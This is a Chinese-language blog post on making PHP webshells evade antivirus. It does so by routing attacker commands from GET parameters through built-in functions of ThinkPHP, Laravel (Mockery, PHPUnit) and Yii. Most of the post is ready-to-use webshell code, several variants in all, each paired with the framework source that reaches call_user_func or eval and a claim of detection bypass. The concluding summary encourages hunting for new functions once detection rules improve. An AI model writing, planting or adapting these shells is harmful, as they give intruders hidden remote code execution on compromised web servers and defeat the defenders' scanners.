什么?你還不會webshell免殺?
VSole2022-07-28 17:09:46
基于框架免殺
thinkphp
array_map_recursive函數
<?php
define('WWW_PATH',str_replace('\\','/',realpath(dirname(__FILE__).'/../')));
include(WWW_PATH."ThinkPHP/Common/functions.php");
array_map_recursive(I('get.func','',''),I('get.cmd','',''));
array_map_recursive函數分析
這里存在一個call_user_func命令執行函數
function array_map_recursive($filter, $data) {
$result = array();
foreach ($data as $key => $val) {
$result[$key] = is_array($val)
? array_map_recursive($filter, $val)
: call_user_func($filter, $val);
}
return $result;
}
免殺效果
B函數
<?php
define('WWW_PATH',str_replace('\\','/',realpath(dirname(__FILE__).'/../')));
include(WWW_PATH."ThinkPHP/Common/functions.php");
include(WWW_PATH."ThinkPHP/Library/Think/Hook.class.php");
class demo{
function test($v){
I('get.func','','')($v);
}
}
B("demo","test",I('get.cmd','',''));
免殺效果
B函數分析
function B($name, $tag='',&$params=NULL) {
if(''==$tag){
$name .= 'Behavior';
}
return \Think\Hook::exec($name,$tag,$params);
}
exec函數分析
在exec函數用存在有個類調用,且所有的參數都可控
static public function exec($name, $tag,&$params=NULL) {
if('Behavior' == substr($name,-8) ){
// 行為擴展必須用run入口方法
$tag = 'run';
}
$addon = new $name();
return $addon->$tag($params);
}
smarty_php_tag函數
<?php
define('WWW_PATH',str_replace('\\','/',realpath(dirname(__FILE__).'/../')));
include(WWW_PATH."ThinkPHP/Library/Vendor/Smarty/SmartyBC.class.php");
smarty_php_tag("",I('get.cmd','',''),"");
免殺效果
smarty_php_tag函數分析
直接存在命令執行,且參數可控
function smarty_php_tag($params, $content, $template, &$repeat)
{
eval($content);
return '';
}
I函數
<?php
define('WWW_PATH',str_replace('\\','/',realpath(dirname(__FILE__).'/../')));
include(WWW_PATH."ThinkPHP/Common/functions.php");
I('get.func','','')(I('get.cmd','',''));
免殺效果
Laravel
EvalLoader#load
<?php
define('WWW_PATH',str_replace('\\','/',realpath(dirname(__FILE__).'/../')));
include(WWW_PATH."/vendor/autoload.php");
$c = new Mockery\Generator\MockConfiguration(array(),array(),array(),'demo');
$b = new Mockery\Generator\MockDefinition($c,'<?='.$_GET['cmd']);
$a = new Mockery\Loader\EvalLoader();
$a->load($b);
免殺效果
EvalLoader#load分析
eval命令執行函數,參數可控
class EvalLoader implements Loader
{
public function load(MockDefinition $definition)
{
if (class_exists($definition->getClassName(), false)) {
return;
}
eval("?>" . $definition->getCode());
}
}
MockTrait#generate
<?php
define('WWW_PATH',str_replace('\\','/',realpath(dirname(__FILE__).'/../')));
include(WWW_PATH."/vendor/autoload.php");
$a = new PHPUnit\Framework\MockObject\MockTrait($_GET['cmd'],'demo');
$a->generate();
免殺效果
MockTrait#generate函數分析
存在一個eval函數
public function generate(): string
{
if (!\class_exists($this->mockName, false)) {
eval($this->classCode);
}
return $this->mockName;
}
yii
MockTrait#generate
<?php
define('WWW_PATH',str_replace('\\','/',realpath(dirname(__FILE__).'/../')));
include(WWW_PATH."/vendor/autoload.php");
$a = new PHPUnit\Framework\MockObject\MockTrait($_GET['cmd'],'demo');
$a->generate();
免殺效果
view#evaluateDynamicContent
<?php
define('WWW_PATH',str_replace('\\','/',realpath(dirname(__FILE__).'/../')));
include(WWW_PATH."/vendor/autoload.php");
$a = new yii\base\View();
$a->evaluateDynamicContent($_GET['cmd']);
免殺效果
view#evaluateDynamicContent分析
public function evaluateDynamicContent($statements)
{
return eval($statements);
}
總結
通過文件包含框架文件,用框架內置的函數來替換一句話木馬中的功能函數,達到繞過特征匹配,如果后期規則增強,可以通過搜索新的函數來間接調用函數,像反序列化利用鏈一樣,當然,還有很多其他函數可以使用在這里就不多列舉。
VSole
網絡安全專家